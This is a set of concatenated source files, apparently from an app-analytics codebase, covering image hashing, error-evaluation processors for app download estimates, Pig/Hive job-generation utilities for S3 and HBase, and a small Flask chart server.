shell=True, stdout=PIPE, stdin=PIPE, stderr=PIPE)
proc.stdin.write(raw_image)
proc.stdin.close()
conv_raw_image = proc.stdout.read()
proc.kill()
return conv_raw_image
def compute_imagehash(image, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Compute the hash over the raw image bytecode.
"""
if hash_type == 'ahash':
computed_hash = imagehash.average_hash(image, hash_size=hash_size)
elif hash_type == 'dhash':
computed_hash = imagehash.dhash(image, hash_size=hash_size)
elif hash_type == 'phash':
computed_hash = imagehash.phash(image, hash_size=hash_size)
else:
raise Exception("hash_type should be 'ahash, 'dhash' or 'phash'")
return computed_hash
def compute_averagecolor(image):
"""
Compute the average image color from the raw image bytecode.
"""
histogram = image.histogram()
# split into red, green, blue
r, g, b = histogram[0:256], histogram[256:256*2], histogram[256*2:256*3]
sum_r,sum_g, sum_b = sum(r),sum(g),sum(b)
# perform the weighted average of each channel:
# the *index* is the channel value, and the *value* is its weight
return (
sum( i*w for i, w in enumerate(r) ) / sum_r if sum_r>0 else 0,
sum( i*w for i, w in enumerate(g) ) / sum_g if sum_g>0 else 0,
sum( i*w for i, w in enumerate(b) ) / sum_b if sum_b>0 else 0
)
<file_sep>/old_investigations/internal/config.py
import sys
import os.path
# Mark's script's path
daily_estimate_script_path = "/Users/perezrafael/appannie/aa/estimation/ios/gen_daily_app_estimates.py"
if not os.path.exists(daily_estimate_script_path):
print("Error: Please specify the right path for daily estimate script!!!")
sys.exit(2)
<file_sep>/product_quality/internal/processor.py
"""Processors for estimating the quality of the results.
<NAME> (<EMAIL>) refactorred based on Rafael
(<EMAIL>)'s original code.
Each processor accept a DataFrame as the argument, and returns a 3-tuple, include:
- DataFrame: Some processor will alter the DataFrame, adding or deleting information.
- Header: The header will be prefixed to the response of the current scope (explain later).
- Response: A str or a list of str, representing the output of the processor.
The processors are chained with ChainProcessor, by passing to ChainProcessor's
construction function. processors can be scoped by encapsulated in a nested
list. The processors inside the scope may alter the header and/or DataFrame, but
the alteration doesn't affect the processors outside the scope.
"""
import collections
import pandas as pd
import numpy as np
from scipy.stats import ks_2samp
class ChainProcessor():
def __init__(self, *args):
self._processors = args
def process(self, df):
return self._use_processes(self._processors, df)
def _use_processes(self, ps, df):
res_all = ""
current_header = ""
for p in ps:
if isinstance(p, collections.Iterable):
(_, _, res) = self._use_processes(p, df)
else:
(df, header, res) = p.process(df)
if isinstance(header, str):
current_header = header
if isinstance(res, str):
res_all += (current_header + res)
elif isinstance(res, collections.Iterable):
res_all += ''.join([current_header + s for s in res])
return (df, "", res_all)
class HeaderWriter(object):
"""Re-write the header
"""
def __init__(self, header):
self._header = header
def process(self, df):
return (df, self._header, None)
############################# Filter #########################################
# Usually, they alter the dataframe by filtering out some rows. #
# No header or output will be added. #
##############################################################################
class UnitRankRangeFilter(object):
"""Select apps with RankRange.
"""
def __init__(self, rank_range):
self._rank_range = rank_range
def process(self, df):
header = ""
if self._rank_range[0] == 1:
header = "(Top %d (by real units)) " % self._rank_range[1]
else:
header = "(Rank (by real units) range: %d--%d) " % (self._rank_range[0], self._rank_range[1])
return (self._filter_by_rank_range(df),
header, None)
def _filter_by_rank_range(self, df):
if 'date' in df.columns:
return self._filter_by_rank_range_with_date(df)
else:
return self._filter_by_rank_range_without_date(df)
def _filter_by_rank_range_without_date(self, df):
rank_range = self._rank_range
selected = df.sort('units', ascending=False)[(rank_range[0] - 1):(rank_range[1] + 1)]
top_apps = selected[['app_id']]
return df.merge(top_apps, on=['app_id'])
def _filter_by_rank_range_with_date(self, df):
"""Select apps within the rank range in each day.
"""
rank_range = self._rank_range
top_apps = pd.DataFrame(columns=['date', 'app_id'])
grouped = df.groupby(['date'])
for _, group in grouped:
group = group.sort('units', ascending=False)
selected = group.sort('units', ascending=False)[(rank_range[0] - 1):(rank_range[1] + 1)]
top_apps = top_apps.append(selected[['date', 'app_id']])
return df.merge(top_apps, on=['date', 'app_id'])
class MedianRankRangeFilter(object):
def __init__(self, rank_range):
self._rank_range = rank_range
def process(self, df):
header = ""
if self._rank_range[0] == 0:
header = "(Top %d) " % self._rank_range[1]
else:
header = "(Median Rank range: %d--%d) " % (self._rank_range[0], self._rank_range[1])
return (self._filter_by_rank_range(df),
header, None)
def _filter_by_rank_range(self, df):
rank_range = self._rank_range
if isinstance(df['median_rank'][0], str):
df['median_rank'] = df['median_rank'].map(lambda s: np.asarray([float(x) for x in s.split(',')]))
sel = df['median_rank'].map(lambda x: np.any(np.logical_and(x >= rank_range[0], x <= rank_range[1])))
return df[sel]
############################# Calculator #####################################
# Usually, they add a column to the dataframe by calculating something. #
# No header or output will be added. #
##############################################################################
class SBECalculator(object):
"""Add a 'sbe' column.
"""
def process(self, df):
df = self._generate_and_merge_sbe(df)
return (df, None, None)
def _generate_and_merge_sbe(self, df):
# Aggregate (mean) across categories
gdf = df.groupby(['store_id', 'feed_id', 'app_id', 'date'])['estimate'].mean()
gdf = gdf.reset_index()
# Aggregate (sum) across feeds
ddf = gdf.groupby(['store_id', 'app_id', 'date'])['estimate'].sum()
ddf = ddf.reset_index()
ddf.rename(columns={'estimate': 'sbe'}, inplace=True)
return df.merge(ddf, on=['store_id', 'app_id', 'date'])
class RelErrorCalculator(object):
def __init__(self, est_column='estimate'):
self._est_column = est_column
def process(self, df):
relerror = (df['units'] - df[self._est_column]).abs() / df['units']
df['relerror'] = relerror
return (df, None, None)
class AbsErrorCalculator(object):
def __init__(self, est_column='estimate'):
self._est_column = est_column
def process(self, df):
abserror = (df['units'] - df[self._est_column]).abs()
df['abserror'] = abserror
return (df, None, None)
############################# Evaluator ######################################
# They will evaluate the results and generate response str. #
# Generally, dataframe will keep unaltered. #
##############################################################################
class RelErrorRatioEvaluator():
"""Used for evaluating the percentage of apps goes beyond the rel error threshold.
"""
def __init__(self, max_rel_error):
"""
Parameters
----------
max_rel_error: float, the error threshold.
"""
self._max_rel_error = max_rel_error
def process(self, df):
if 'relerror' in df.columns:
rel_error = df['relerror']
else:
rel_error = (df['units'] - df['estimate']).abs() / df['units']
percent = (rel_error >= self._max_rel_error).sum() / float(rel_error.shape[0])
res = "%% of analytics apps over %.0f%% error: %f\n" % (self._max_rel_error * 100, percent)
return (df, None, res)
class RelErrorAndAbsErrorEvaluator():
"""Evaluate the Relative error and absolute error at the same time.
e.g. Percentage of apps goes beyond 10% relerror AND 100 units abserror.
"""
def __init__(self, max_rel_error, max_abs_error):
self._max_rel_error = max_rel_error
self._max_abs_error = max_abs_error
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
if 'relerror' in df.columns:
rel_error = df['relerror']
else:
rel_error = abs_error / df['units']
percent = ((rel_error >= self._max_rel_error) & (abs_error >= self._max_abs_error)).sum() / float(rel_error.shape[0])
res = "%% of analytics apps over %.0f%% and %.2f units error: %f\n" % (self._max_rel_error * 100,
self._max_abs_error,
percent)
return (df, None, res)
class RelErrorMedianEvaluator(object):
"""Evaluate the median of the relative error.
"""
def process(self, df):
if 'relerror' in df.columns:
relative_diff = df['relerror']
else:
relative_diff = (df['units'] - df['estimate']).abs() / df['units']
med = relative_diff.median()
res = "median relative error: %f\n" % med
return (df, None, res)
class AbsErrorMedianEvaluator(object):
"""Evaluate the median of the relative error.
"""
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
med = abs_error.median()
res = "median absolute error: %f\n" % med
return (df, None, res)
class RelErrorAvgEvaluator(object):
"""Evaluate the average of the relative error.
"""
def process(self, df):
if 'relerror' in df.columns:
relative_diff = df['relerror']
else:
relative_diff = (df['units'] - df['estimate']).abs() / df['units']
mean = relative_diff.mean()
res = "average relative error: %f\n" % mean
return (df, None, res)
class AbsErrorAvgEvaluator(object):
"""Evaluate the average of the relative error.
"""
def process(self, df):
if 'abserror' in df.columns:
abs_error = df['abserror']
else:
abs_error = (df['units'] - df['estimate']).abs()
mean = abs_error.mean()
res = "average absolute error: %f\n" % mean
return (df, None, res)
class SampleNumEvaluator(object):
"""Get the number of samples
"""
def process(self, df):
res = "num of samples: %d\n" % df.shape[0]
return (df, None, res)
class EstimationSDEvaluator(object):
"""The average SD of estimations across categories.
"""
def process(self, df):
res = "Multiple category Estimates Mean Standard Deviation: %f\n" % df['estimate_sd'].mean()
return (df, None, res)
class KSEvaluator(object):
"""Kolmogorov-Smirnof statistic.
Use Kolmogorov-Smirnof statistic to test if CDF of actuals
and estimates belong to the same distribution.
If they belong to the same distribution could mean correct estimates.
ks_stat[0] is the K-S statistic, smaller values are better
ks_stat[1] is the p-value, higher values are better
"""
def process(self, df):
units = df['units']
est = df['estimate']
ks_stat = ks_2samp(units, est)
res = []
res.append("Distributions similarity KS-Stat: %s\n" % ks_stat[0])
res.append("Distributions similarity p-value: %s\n" % ks_stat[1])
return (df, None, res)
<file_sep>/old_investigations/android/README.md
Please read the ../README.md for more details.
For GP, it's almost as same as iOS just with the parameters differents.
<file_sep>/aa_au_model/hive_scripts/workflow/module/utils.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import re
import os
import simplejson
import sys
import datetime
import time
import commands
from constants import SCHEMA_PATH_MAPPING
def get_s3_storage_info(schema_name, params, settings):
schema = load_schema(schema_name)
key_name = replace_params(schema['table'], params)
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
bucket = getattr(settings, schema['bucket'])
return access_key, secret_key, bucket, key_name
def replace_params(s, params):
kw = sorted(params.iteritems(), key=lambda asd: asd[0], reverse=True)
for k, v in kw:
if '$' + k in s:
s = s.replace('$' + k, str(v))
return s
def last_time_range(date_str, hour, interval):
date = datetime.datetime.strptime(date_str, '%Y-%m-%d')
if hour is None:
for i in range(interval):
cur_date = date - datetime.timedelta(days=i)
yield cur_date.strftime('%Y-%m-%d')
else:
begin_hour = datetime.datetime.strptime(date_str + ' %s' % hour, '%Y-%m-%d %H')
temp_list = []
pre_hour = begin_hour
for i in range(interval):
cur_hour = begin_hour - datetime.timedelta(hours=i)
if cur_hour.day != pre_hour.day:
if len(temp_list) == 24:
yield pre_hour.strftime('%Y-%m-%d')
else:
for tt in temp_list:
yield tt.strftime('%Y-%m-%d/%H')
temp_list = []
temp_list.append(cur_hour)
pre_hour = cur_hour
if len(temp_list) == 24:
yield cur_hour.strftime('%Y-%m-%d')
else:
for tt in temp_list:
yield tt.strftime('%Y-%m-%d/%H')
def determine_load_time_range(schema_name, table, params):
date_range = '$date'
load_hour = params.get('hour')
load_date = params.get('date')
if '$date/$hour' in table:
date_range = '$date/$hour'
else:
date_range = '$date'
if len(schema_name.split(':', 1)) == 2:
interval_s = replace_params(schema_name.split(':', 1)[1], params)
interval_l = interval_s.split(':')
interval = int(interval_l[0][:-1]) if interval_l[0].endswith('H') else int(interval_l[0])
if len(interval_l) >= 2:
load_date = interval_l[1]
if len(interval_l) >= 3:
load_hour = interval_l[2]
if interval_l[0].endswith('H') and load_hour is None:
load_hour = '00'
elif not interval_l[0].endswith('H'):
load_hour = None
date_range = '{' + ','.join([d for d in last_time_range(str(load_date), load_hour, interval)]) + '}'
return date_range
def generate_hbase_load_str(schema, t=None):
"""
Generate hbase load string
"""
return ("""'hbase://%(table_name)s'
USING org.apache.pig.backend.hadoop.hbase.HBaseStorage (
'%(columns)s', '-caching 500') AS (%(schema)s)""" % {
'table_name': (schema['table'] if not t else schema['table'] + '_%s' % t),
'columns': ' '.join([k[0] for k in schema['schema']]),
'schema': ', '.join([k[1] for k in schema['schema']])
})
def generate_hdfs_load_str(schema, t=None):
"""
Generate hdfs load string
"""
return ("""'$input_root_dir/%(table_name)s' AS (%(schema)s)
""") % {
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
def generate_hdfs_store_str(schema, t=None):
store_str = "'$output_root_dir/%s'" % schema['table']
if 'multi_storage_column' in schema:
multi_storage_column = [
i for i in range(len(schema['schema']))
if schema['schema'][i].startswith('%s:' % schema['multi_storage_column'])
][0]
store_str = re.sub(r'\$%s\'$' % schema['multi_storage_column'], '\'', store_str)
store_str += " USING org.apache.pig.piggybank.storage.MultiStorage(%s, '%s', 'none', '\\\\t')" % (
store_str, multi_storage_column
)
return (
store_str,
'$output_root_dir/%s' % schema['table']
)
def generate_s3_store_str(schema, t=None):
if t:
return (
"'$output_root_dir/%s'" % schema['table'],
'$output_root_dir/%s' % schema['table']
)
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
bucket_name = getattr(settings, schema['bucket'])
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
store_str = "'s3n://%s/%s'" % (bucket_name, schema['table'])
if schema.get('need_credential'):
store_str = "'s3n://%s:%s@%s/%s'" % (access_key, secret_key, bucket_name, schema['table'])
table_out = schema['table']
if 'multi_storage_column' in schema:
multi_storage_column = [
i for i in range(len(schema['schema']))
if schema['schema'][i].startswith('%s:' % schema['multi_storage_column'])
][0]
store_str = re.sub(r'\$%s\'$' % schema['multi_storage_column'], '\'', store_str)
table_out = re.sub(r'\$%s$' % schema['multi_storage_column'], '', schema['table'])
store_str += " USING org.apache.pig.piggybank.storage.MultiStorage(%s, '%s', 'none', '\\\\t')" % (
store_str, multi_storage_column
)
return (
store_str,
's3n://%s:%s@%s/%s' % (access_key, secret_key, bucket_name, table_out)
)
def generate_s3_load_str(schema, t=None):
if t:
return ("""'$input_root_dir/%(table_name)s' AS (%(schema)s)
""") % {
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
bucket_name = getattr(settings, schema['bucket'])
if schema.get('need_credential'):
access_key = getattr(settings, schema['access_key'])
secret_key = getattr(settings, schema['secret_key'])
bucket_name = '%s:%s@%s' % (access_key, secret_key, bucket_name)
return ("""'s3n://%(bucket_name)s/%(table_name)s' AS (%(schema)s)
""") % {
'bucket_name': bucket_name,
'table_name': schema['table'],
'schema': ', '.join(schema['schema'])
}
def generate_hbase_store_str(schema, t=None):
params = {
'table': (schema['table'] if not t else schema['table'] + '_%s' % t),
'storage': 'org.apache.pig.backend.hadoop.hbase.HBaseStorage',
'schema': ' '.join([k[0] for k in schema['schema']])
}
return (
"""'%(table)s' USING %(storage)s ('%(schema)s', '-caster HBaseBinaryConverter')""" % params,
(schema['table'] if not t else schema['table'] + '_%s' % t)
)
def generate_local_load_str(schema, t=None):
from conf import settings
local_root_dir = getattr(settings, schema['local_root_dir'])
print ("""'%(local_root_dir)s/%(table)s' AS (%(schema)s)
""") % {
'local_root_dir': local_root_dir,
'table': schema['table'],
'schema': ', '.join(schema['schema'])
}
return ("""'%(local_root_dir)s/%(table)s' AS (%(schema)s)
""") % {
'local_root_dir': local_root_dir,
'table': schema['table'],
'schema': ', '.join(schema['schema'])
}
def generate_local_store_str(schema, t=None):
from conf import settings
local_root_dir = getattr(settings, schema['local_root_dir'])
print "STORE:" + local_root_dir + schema['table']
return (
"'%s/%s'" % (local_root_dir, schema['table']),
"'%s/%s'" % (local_root_dir, schema['table'])
)
LOAD_STR_FUNC_MAPPING = {
'hbase': generate_hbase_load_str,
'hdfs': generate_hdfs_load_str,
's3': generate_s3_load_str,
'local': generate_local_load_str
}
STORE_STR_FUNC_MAPPING = {
'hbase': generate_hbase_store_str,
'hdfs': generate_hdfs_store_str,
's3': generate_s3_store_str,
'local': generate_local_store_str
}
def load_schema(schema_name):
try:
p = {}
if '|' in schema_name:
schema_name, p_s = schema_name.split('|')
p.update(dict(
i.split('=')
for i in p_s.split(',')
))
schema_path = SCHEMA_PATH_MAPPING[schema_name.lower()[-2:]]
schema_def_root_path = os.path.join(
os.path.split(os.path.realpath(__file__))[0], '../../schema', schema_path
)
schema_def_file_path = os.path.join(
schema_def_root_path, '%s.schema' % schema_name.lower()
)
d = simplejson.loads(
open(schema_def_file_path, 'r').read()
)
d['schema_name'] = schema_name
d['table'] = replace_params(d['table'], p)
return d
except:
return None
def generate_pig_file(pig_file_path, pig_file_name, params, t=None):
"""
Generate running pig file
"""
whole_path = os.path.join(pig_file_path, pig_file_name + '.pig')
pig_file_str = open(whole_path, 'r').read()
pig_file_str = replace_load_str(pig_file_str, params, t)
# Since pig local model did not support 'skewed', so remove it when local testing
if t:
pig_file_str = pig_file_str.replace(" USING 'skewed'", '')
pig_file_str, output_path_list = replace_store_str(pig_file_str, t)
timestamp = datetime.datetime.now().strftime('%s%f')
output_file_path = os.path.join(
pig_file_path, '%s_%s.pig' % (pig_file_name, timestamp)
)
f = open(output_file_path, 'w')
f.write(pig_file_str)
f.close()
return output_file_path, output_path_list
def replace_load_str(pig_file_str, params, t=None):
"""
Replace LOAD code in pig with real LOAD string
"""
schema_list = re.findall(r'LOAD ###(.+?)###', pig_file_str)
for schema_name in set(schema_list):
schema = load_schema(schema_name.split(':')[0])
date_range = determine_load_time_range(schema_name, schema['table'], params)
load_str = LOAD_STR_FUNC_MAPPING[schema['type']](schema, t)
if date_range not in load_str:
load_str = re.sub(r'\$date/\$hour.*?\'', date_range + '\'', load_str)
load_str = re.sub(r'\$date.*?\'', date_range + '\'', load_str)
pig_file_str = pig_file_str.replace(
'LOAD ###%s###;' % schema_name,
'LOAD %s;' % load_str
)
return pig_file_str
def replace_store_str(pig_file_str, t=None):
"""
Replace STORE code in pig with real STORE string
"""
schema_list = re.findall(r'INTO ###(.+?)###', pig_file_str)
output_path_list = []
for schema_name in set(schema_list):
schema = load_schema(schema_name)
store_str, output_path = STORE_STR_FUNC_MAPPING[schema['type']](schema, t)
pig_file_str = pig_file_str.replace(
'INTO ###%s###' % schema_name,
"INTO %s" % store_str
)
output_path_list.append(output_path)
return pig_file_str, output_path_list
def parse_s3_str(s3_str):
access_key = s3_str.rsplit(':', 1)[0][6:]
secret_key = s3_str.rsplit(':', 1)[1].split('@')[0]
bucket_name = s3_str.split('@')[1].split('/', 1)[0]
key_name = s3_str.split('@')[1].split('/', 1)[1]
return access_key, secret_key, bucket_name, key_name
def retry_cmd_on_aws_error(cmd):
status, output = 0, 'Rate exceeded'
while output.endswith('Rate exceeded') or output.endswith('Please try again after some time.'):
status, output = commands.getstatusoutput(cmd)
time.sleep(3)
return status, output
def generate_hive_file(hive_file_path, hive_file_name, params, t=None):
"""
Generate running sql file
"""
whole_path = os.path.join(hive_file_path, hive_file_name + '.sql')
hive_file_str = open(whole_path, 'r').read()
hive_file_str = replace_select_from_str(hive_file_str, params, t)
hive_file_str, output_path_list = replace_create_external_table_str(
hive_file_str, params, t)
timestamp = datetime.datetime.now().strftime('%s%f')
output_file_path = os.path.join(
hive_file_path, '%s_%s.sql' % (hive_file_name, timestamp)
)
f = open(output_file_path, 'w')
f.write(hive_file_str)
f.close()
return output_file_path, output_path_list
def replace_select_from_str(hive_file_str, params, t=None):
"""
Replace SELECT * FROM tbl_name code in hive SQL with real
CREATE, SELECT and DROP sentences.
"""
schema_list = re.findall((
'(INSERT[^;]+?TABLE[^;]+?([^ ;]+)[^;]+?FROM[^a-zA-Z0-9]+?###([^;]+?)###'
'[^;]*?;)'),
hive_file_str, re.DOTALL)
for sentence, tbl_name, schema_name in set(schema_list):
schema = load_schema(schema_name.split(':')[0])
# Add initial CREATE TABLE sentence.
loc_str, schemas = LOAD_STR_FUNC_MAPPING[schema['type']](
schema, t).split('AS')
schemas = _replace_pig_schema_to_hive(schemas)
partitions = schema.get('hive_partitions')
split_partitions = _split_partitions(partitions)
init_create_sentence = (
'CREATE TABLE IF NOT EXISTS {tbl_name} {schema}{partition};'
).format(
tbl_name=tbl_name, schema=schemas,
partition=' PARTITIONED BY ({})'.format(
partitions.replace(':', ' ')) if partitions else '')
replace_list = [init_create_sentence]
date_range = replace_params(determine_load_time_range(
schema_name, schema['table'], params
).rstrip('}').lstrip('{'), params).split(',')
for date in date_range:
params.update({'date': date})
# Add CREATE EXTERNAL TABLE sentence before INSERT
replaced_loc_str = loc_str.replace('$date/$hour', date).strip()
replaced_loc_str = replaced_loc_str.replace('$date', date)
if split_partitions:
replaced_loc_str = '\'{}/{}\''.format(
replaced_loc_str.strip('\''),
'/'.join(split_partitions).replace('\'', ''))
replaced_loc_str = replace_params(replaced_loc_str, params)
create_sentence = (
"CREATE EXTERNAL TABLE IF NOT EXISTS {tbl_name}_\n"
" {schema}\n"
" ROW FORMAT {row_format}\n"
" FIELDS TERMINATED BY '{fields_sep}'\n"
" LINES TERMINATED BY '{lines_sep}'\n"
" STORED AS {storage} \n"
" LOCATION {location};"
).format(
tbl_name=tbl_name,
schema=schemas,
row_format=schema.get('hive_row_format') or 'DELIMITED',
fields_sep=schema.get('hive_fields_delimiter') or r'\t',
lines_sep=schema.get('hive_lines_delimiter') or r'\n',
storage=schema.get('hive_storage_format') or 'TEXTFILE',
location=replaced_loc_str)
create_sentence = re.sub(' +', ' ', create_sentence)
# Add INSERT sentence
if split_partitions:
insert_sentence = sentence.replace(
tbl_name, '{} PARTITION ({})'.format(
tbl_name, ','.join(split_partitions))
).replace(
r'###{}###'.format(schema_name), '{}_'.format(tbl_name))
else:
insert_sentence = sentence.replace(
r'###{}###'.format(schema_name), '{}_'.format(tbl_name))
insert_sentence = replace_params(insert_sentence, params)
# Add DROP sentence.
drop_sentence = 'DROP TABLE IF EXISTS {}_;'.format(tbl_name)
replace_list += [
drop_sentence, create_sentence, insert_sentence, drop_sentence]
hive_file_str = hive_file_str.replace(sentence, '\n'.join(replace_list))
return hive_file_str
def _replace_pig_schema_to_hive(schema):
result = schema.lower().strip()
pig_to_hive_data_type_mapping = {
'chararray': 'STRING',
'int': 'BIGINT',
'long': 'BIGINT',
'float': 'DECIMAL',
'double': 'DECIMAL'
}
for k, v in pig_to_hive_data_type_mapping.iteritems():
result = result.replace(k, v)
return result.replace(':', ' ')
def _split_partitions(partitions_str):
if not partitions_str:
return None
cols = [col.strip().split(':') for col in partitions_str.split(',')]
return map(lambda col: '{n}=${n}'.format(n=col[0])
if col[1].upper() in ('BIGINT', 'DOUBLE', 'DECIMAL')
else '{n}=\'${n}\''.format(n=col[0]), cols)
def replace_create_external_table_str(hive_file_str, params, t=None):
"""
Replace CREATE EXTERNAL TABLE code in hive SQL with real SQL sentences.
"""
def _replace_path_str(loc_str, partitions):
"""
Replace partition directories in location string
"""
if not partitions:
return loc_str
partitions_name = map(
lambda x: x[0].strip(),
[partition.split(':') for partition in partitions.split(',')])
loc_directories = loc_str.strip("'").split('/')
start_replace_id = len(loc_directories)
for id in xrange(1, start_replace_id):
has_replaced = False
for partition_name in partitions_name:
if loc_directories[id] == '$' + partition_name:
has_replaced = True
break
if has_replaced:
break
return "'{}'".format('/'.join(loc_directories[:id])) if has_replaced \
else loc_str
schema_list = re.findall(
r'CREATE[^;]+?TABLE[^;]+?([^ ;]+) +###([^;]+?)###[^;]*?;',
hive_file_str, re.DOTALL)
output_path_list = []
for tbl_name, schema_name in set(schema_list):
schema = load_schema(schema_name)
loc_str, schemas = [
s.strip() for s in LOAD_STR_FUNC_MAPPING[schema['type']](schema, t)
.split('AS')]
loc_str = loc_str.replace('$input_root_dir', '$output_root_dir')
schemas = _replace_pig_schema_to_hive(schemas)
partitions = schema.get('hive_partitions')
root_loc = _replace_path_str(loc_str, partitions)
schema_str = (
"\n {schema}\n"
"{partition}"
" ROW FORMAT {row_format}\n"
" FIELDS TERMINATED BY '{fields_sep}'\n"
" LINES TERMINATED BY '{lines_sep}'\n"
" STORED AS {storage}\n"
" LOCATION {location}"
).format(
schema=schemas,
partition=' PARTITIONED BY ({})\n'.format(
partitions.replace(':', ' ')) if partitions else '',
row_format=schema.get('hive_row_format') or 'DELIMITED',
fields_sep=schema.get('hive_fields_delimiter') or r'\t',
lines_sep=schema.get('hive_lines_delimiter') or r'\n',
storage=schema.get('hive_storage_format') or 'TEXTFILE',
location=root_loc)
if partitions:
schema_str += (
";\nALTER TABLE {tbl_name} DROP IF EXISTS "
"PARTITION ({partition});\n"
"ALTER TABLE {tbl_name} ADD IF NOT EXISTS "
"PARTITION ({partition}) LOCATION {loc}"
).format(
tbl_name=tbl_name,
partition=','.join(_split_partitions(partitions)),
loc=loc_str)
schema_str = replace_params(schema_str, params)
hive_file_str = hive_file_str.replace(
r'###{}###'.format(schema_name), re.sub(' +', ' ', schema_str))
output_path_list.append(loc_str)
return hive_file_str, output_path_list
def retry_cmd_on_aws_error(cmd):
status, output = 0, 'Rate exceeded'
while output.endswith('Rate exceeded') or output.endswith('Please try again after some time.'):
status, output = commands.getstatusoutput(cmd)
time.sleep(3)
return status, output<file_sep>/datathon/visualizations/main.py
import pygal
import pandas as pd
import pygal_maps_world
from flask import Flask, Response , render_template
app = Flask(__name__ , static_url_path='')
@app.route('/')
def index():
""" render svg figures on html """
return render_template('index.html')
@app.route('/worldmap_scale/')
def worldmap_scale():
""" read data """
map_data = pd.read_csv("map_data.csv",names=['country','value'],header=False)
""" render svg graph """
worldmap_chart = pygal.maps.world.World()
worldmap_chart.title = 'Number of VPN connected devices by country \n 01-05-2015 -- 31-05-2015'
worldmap_chart.add('#devices', dict(zip(map_data.country.astype(str),map_data.value)))
worldmap_chart.render()
return Response(response=worldmap_chart.render(), content_type='image/svg+xml')
@app.route('/worldmap/')
def worldmap():
""" read data """
map_data = pd.read_csv("map_data.csv",names=['country','value'],header=False)
""" render svg graph """
wmp = pygal.maps.world.World()
wmp.title = 'Number of VPN connected devices by country \n 01-05-2015 -- 31-05-2015'
thresh1 = 100000
wmp.add(">=100k",dict(zip(map_data[map_data.value >= thresh1].country.astype(str), map_data[map_data.value >= thresh1].value)))
thresh2 = 50000
wmp.add("50k - 100k",dict(zip(map_data[(map_data.value >= thresh2) & (map_data.value < thresh1)].country.astype(str),
map_data[(map_data.value >= thresh2) & (map_data.value < thresh1)].value)))
thresh3 = 10000
wmp.add("10k - 50k",dict(zip(map_data[(map_data.value >= thresh3) & (map_data.value < thresh2)].country.astype(str),
map_data[(map_data.value >= thresh3) & (map_data.value < thresh2)].value)))
thresh4 = 5000
wmp.add("5k - 10k",dict(zip(map_data[(map_data.value >= thresh4) & (map_data.value < thresh3)].country.astype(str),
map_data[(map_data.value >= thresh4) & (map_data.value < thresh3)].value)))
thresh5 = 1000
wmp.add("1k - 5k",dict(zip(map_data[(map_data.value >= thresh5) & (map_data.value < thresh4)].country.astype(str),
map_data[(map_data.value >= thresh5) & (map_data.value < thresh4)].value)))
wmp.add("<1k",dict(zip(map_data[(map_data.value < thresh5)].country.astype(str), map_data[map_data.value < thresh3].value)))
wmp.render()
return Response(response=wmp.render(), content_type='image/svg+xml')
from pygal.style import DarkGreenStyle
@app.route('/piechart/')
def piechart():
pie_data = pd.read_csv("pie_data.csv",names=['app_name','counts'],header=False)
pie_chart = pygal.Pie(style=DarkGreenStyle)
pie_chart.title = 'App usage in AE'
for index, row in pie_data.iterrows():
pie_chart.add(row['app_name'], row['counts'])
return Response(response=pie_chart.render(), content_type='image/svg+xml')
from pygal.style import DarkColorizedStyle, LightenStyle
@app.route('/linechart/')
def linechart():
line_data = pd.read_csv("line_data.csv",names=['labels','WhatsApp','Netflix','Safari' ,'Facebook'],header=False)
line_chart = pygal.Line(style=DarkColorizedStyle)
dark_lighten_style = LightenStyle('#336676', base_style=DarkColorizedStyle)
line_chart.title = 'App usage in AE \n 01-05-2015 -- 11-05-2015 '
line_chart.x_labels = map(str,line_data['labels'])
line_chart.add('WhatsApp',line_data.WhatsApp)
line_chart.add('Netflix', line_data.Netflix)
line_chart.add('Safari', line_data.Safari)
line_chart.add('Facebook', line_data.Facebook)
return Response(response=line_chart.render(), content_type='image/svg+xml')
from pygal.style import NeonStyle
@app.route('/scatterplot/')
def scatterplot():
scatterplot_data = pd.read_csv("app_duration.csv",names=['app_name','US','AE'])
xy_chart = pygal.XY(stroke=False,style=NeonStyle)
xy_chart.title = 'App duration comparison US and AE'
xy_chart.add('Facebook', [(0, 0), (.1, .2), (.3, .1), (.5, 1), (.8, .6), (1, 1.08), (1.3, 1.1), (2, 3.23), (2.43, 2)])
xy_chart.add('Safari', [(.1, .15), (.12, .23), (.4, .3), (.6, .4), (.21, .21), (.5, .3), (.6, .8), (.7, .8)])
xy_chart.add('Netflix', [(.05, .01), (.13, .02), (1.5, 1.7), (1.52, 1.6), (1.8, 1.63), (1.5, 1.82), (1.7, 1.23), (2.1, 2.23), (2.3, 1.98)])
return Response(response=xy_chart.render(), content_type='image/svg+xml')
from pygal.style import NeonStyle
@app.route('/scatterplot_alter/')
def scatterplot():
scatterplot_data = pd.read_csv("app_duration.csv",names=['app_name','US','AE'])
xy_chart = pygal.XY(stroke=False,style=NeonStyle)
xy_chart.title = 'App duration comparison US and AE'
xy_chart.add('Facebook', [(0, 0), (.1, .2), (.3, .1), (.5, 1), (.8, .6), (1, 1.08), (1.3, 1.1), (2, 3.23), (2.43, 2)])
xy_chart.add('Safari', [(.1, .15), (.12, .23), (.4, .3), (.6, .4), (.21, .21), (.5, .3), (.6, .8), (.7, .8)])
xy_chart.add('Netflix', [(.05, .01), (.13, .02), (1.5, 1.7), (1.52, 1.6), (1.8, 1.63), (1.5, 1.82), (1.7, 1.23), (2.1, 2.23), (2.3, 1.98)])
return Response(response=xy_chart.render(), content_type='image/svg+xml')
if __name__ == '__main__':
app.config['DEBUG'] = True
app.run('0.0.0.0',5000)
<file_sep>/int-vs-m-benchmark/sql/android/1001i3-store_actuals.sql
/*
Store the actuals for the downloads and the revenue.
*/
-- Collect downloads and revenue. --
DROP TEMPORARY TABLE IF EXISTS temp.downloads_temp;
CREATE TEMPORARY TABLE temp.downloads_temp (
app_id integer NOT NULL,
date date NOT NULL,
store_id integer NOT NULL,
feed INT NOT NULL,
units integer NOT NULL,
